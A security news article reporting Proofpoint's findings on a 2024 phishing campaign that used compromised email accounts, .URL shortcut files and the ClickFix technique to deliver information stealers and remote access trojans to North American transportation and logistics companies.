Transportation and logistics companies across North America have become the focus of a sophisticated phishing campaign, delivering a variety of information stealers and remote access trojans (RATs). According to security researchers at Proofpoint, the attackers are leveraging compromised legitimate email accounts to insert malicious content into existing email conversations.

Proofpoint said it has identified at least 15 breached email accounts used to carry out these attacks. The email accounts belong to transportation and shipping companies to make phishing messages appear even more legitimate. However, it remains unclear how the attackers initially gained access to these email accounts or who is orchestrating the campaign.

The activity, observed between May and July 2024, predominantly involved malware such as Lumma Stealer, StealC, and NetSupport. In August 2024, the threat actor shifted tactics, employing new infrastructure and a new delivery method. In addition, the malware payloads expanded to include DanaBot and Arechclient2.

One of the primary tactics used by the attackers involves sending phishing messages containing URLs linked to Google Drive. The malicious URLs lead to an internet shortcut file (.URL), or in some cases, the file is directly attached to the message. When the victim opens the file, it leverages Server Message Block (SMB) to access and execute malware from a remote server, installing the malicious software on the victim's system.

Proofpoint notes that most phishing campaigns are relatively small, involving fewer than 20 emails, but they specifically target companies within the transportation and logistics sector.

The attackers were also observed using a method known as ‘ClickFix’ for malware distribution. The technique relies on tricking users into copying, pasting, and executing a Base64-encoded PowerShell script found in the HTML of phishing emails. The script ultimately leads to the download of an MSI file used to install DanaBot.

In a bid to appear more credible, the threat actors have impersonated well-known software used in transportation and logistics operations, including Samsara, AMB Logistic, and Astra TMS.

While Proffpoint had not attributed the analyzed campaign to any specific threat actor, the researchers believe that the culprit behind it is financially motivated.